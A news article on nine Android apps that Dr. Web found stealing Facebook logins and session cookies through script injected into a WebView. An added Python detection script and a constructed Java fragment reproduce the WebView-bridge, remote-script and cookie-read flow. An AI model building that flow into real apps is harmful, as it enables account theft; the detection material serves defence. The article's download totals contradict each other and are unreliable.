According to foreign media reports, Google has removed nine Android apps from the Play Store that had been downloaded more than 5.8 million times between them. Researchers had reported that the apps stole users' Facebook login credentials. According to an analysis published by the security company Dr. Web, to win users' trust and lower their guard, the apps provided fully functional services, including photo editing and color picking, exercise and training, astrology, and removal of junk files from Android devices.
All of the identified apps offered users the option to log in with their Facebook account in order to disable in-app advertising. Users who chose this option were shown a genuine Facebook login form with fields for a username and password.
Dr. Web's researchers wrote:
These Trojans use a special mechanism to deceive their victims. After receiving the necessary settings from a C&C server at startup, they load the legitimate Facebook page https://www.facebook.com/login.php into a WebView. Next, they load JavaScript received from the C&C server into the same WebView. This script is used directly to hijack the entered login credentials. After that, the JavaScript uses the method provided through the JavascriptInterface annotation to pass the stolen login name and password to the Trojan application, which transmits the data to the attacker's C&C server. After the victim logged into their account, the Trojan also stole cookies from the current authorized session. These cookies were also sent to the cybercriminals.
Analysis of the malicious programs showed that they all received settings to steal Facebook login names and passwords. However, an attacker could easily change the Trojans' settings and order them to load a web page of another legitimate service. They could even use completely fake login forms on phishing websites. Therefore, these Trojans could be used to steal the login name and password of any service.
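The flow Dr. Web describes above (a WebView that loads the real login page, JavaScript fetched at runtime and injected into it, a JavascriptInterface bridge that hands the captured fields back to native code, and a read of the session cookies) can be turned into a static triage rule over decompiled APK sources. The script below is an added example written for this page; it is neither Dr. Web's tooling nor code from the malware. The indicator strings are standard android.webkit APIs (addJavascriptInterface, @JavascriptInterface, evaluateJavascript, CookieManager.getCookie), the scoring thresholds are this example's own choice, and the two Java fragments are constructed for illustration, not taken from the real samples.

```python
import re

# Indicator patterns derived from the mechanism described in the quoted analysis:
# a WebView loads the real Facebook login page, JavaScript fetched at runtime is
# injected into it, and a @JavascriptInterface bridge hands the captured fields
# back to Java, which also reads the session cookies. All API names are real
# android.webkit calls; the thresholds below are this example's own choice.
INDICATORS = {
    "loads_facebook_login": re.compile(r"https?://(?:www\.)?facebook\.com/login", re.I),
    "js_bridge": re.compile(r"addJavascriptInterface\s*\(|@JavascriptInterface"),
    "js_injection": re.compile(r"evaluateJavascript\s*\(|loadUrl\s*\(\s*\"javascript:"),
    "cookie_read": re.compile(r"CookieManager\.getInstance\(\)\.getCookie\s*\("),
    "runtime_fetch": re.compile(r"HttpURLConnection|OkHttpClient|new\s+URL\s*\("),
}

# The three indicators that together make up the core of the technique.
CORE = ("loads_facebook_login", "js_bridge", "js_injection")


def scan_source(text):
    """Return the set of indicator names found in one decompiled source file."""
    return {name for name, pattern in INDICATORS.items() if pattern.search(text)}


def classify(hits):
    """'suspicious' if all CORE indicators co-occur, 'review' if two do, else 'clean'."""
    core_hits = sum(1 for name in CORE if name in hits)
    if core_hits == len(CORE):
        return "suspicious"
    if core_hits == 2:
        return "review"
    return "clean"


def triage(sources):
    """Map each path in {path: source_text} to (verdict, sorted indicator names)."""
    return {path: (classify(hits), sorted(hits))
            for path, hits in ((p, scan_source(t)) for p, t in sources.items())}


# Constructed decompiled-Java fragments for illustration; they are not taken
# from the real samples. The first mirrors the described flow, the second hands
# login off to the system browser via Custom Tabs and exposes no bridge.
SAMPLE_TROJAN = r'''
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Bridge(), "Android");
wv.loadUrl("https://www.facebook.com/login.php");
String js = download(new URL(cfg.scriptUrl));   // script received from C&C
wv.evaluateJavascript(js, null);
String cookies = CookieManager.getInstance().getCookie("https://www.facebook.com");
'''

SAMPLE_BENIGN = r'''
CustomTabsIntent tabs = new CustomTabsIntent.Builder().build();
tabs.launchUrl(this, Uri.parse("https://www.facebook.com/login.php"));
'''

if __name__ == "__main__":
    for path, (verdict, hits) in triage({"Login.java": SAMPLE_TROJAN,
                                         "Auth.java": SAMPLE_BENIGN}).items():
        print(f"{path}: {verdict} {hits}")
```

The rule keys on the combination rather than on any single API: a WebView with a JavascriptInterface bridge is common in legitimate apps, and so is loading a third-party URL. It is only the three together, a foreign login page, a bridge, and script injected into that page, that reproduce the described technique. Treat a "suspicious" verdict as a lead for manual review, not a verdict: an app that legitimately embeds a login flow in a WebView can trip it, and obfuscated or string-encrypted samples can evade it.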
Researchers discovered five malware variants hidden in these applications. Three of them are native Android apps, and the other two are built with Google's Flutter framework, which is designed for cross-platform development. Dr. Web noted that it classifies all of them as the same Trojan family because they use the same configuration file format and the same JavaScript code to steal user data.
Dr. Web identified these variants as:
Android.PWS.Facebook.13
Android.PWS.Facebook.14
Android.PWS.Facebook.15
Android.PWS.Facebook.17
Android.PWS.Facebook.18
Most of the downloads come from an app called PIP Photo, which has been downloaded more than 5.8 million times. Next is Processing Photo, with more than 500,000 downloads. The remaining apps are:
Rubbish Cleaner: over 100,000 downloads
Inwell Fitness: over 100,000 downloads
Horoscope Daily: over 100,000 downloads
App Lock Keep: over 50,000 downloads
Lockit Master: over 5,000 downloads
Horoscope Pi: 1,000 downloads
App Lock Manager: 10 downloads
All of these apps have since been removed from Google Play. A Google spokesperson said the company has also banned the developers of all nine apps from its app store, meaning they will not be allowed to submit new apps. Google's action is appropriate, but it is only a minor obstacle for the developers, who need only pay $25 to register a new developer account under a different name.
Anyone who has installed any of the apps above should remove them and check their device and Facebook account carefully for signs of compromise. Because the Trojans also stole session cookies, changing the Facebook password is not enough on its own: active sessions should be ended as well (Facebook's security settings show where the account is logged in and allow logging out of all other sessions), and any other account that reuses the same password should have it changed.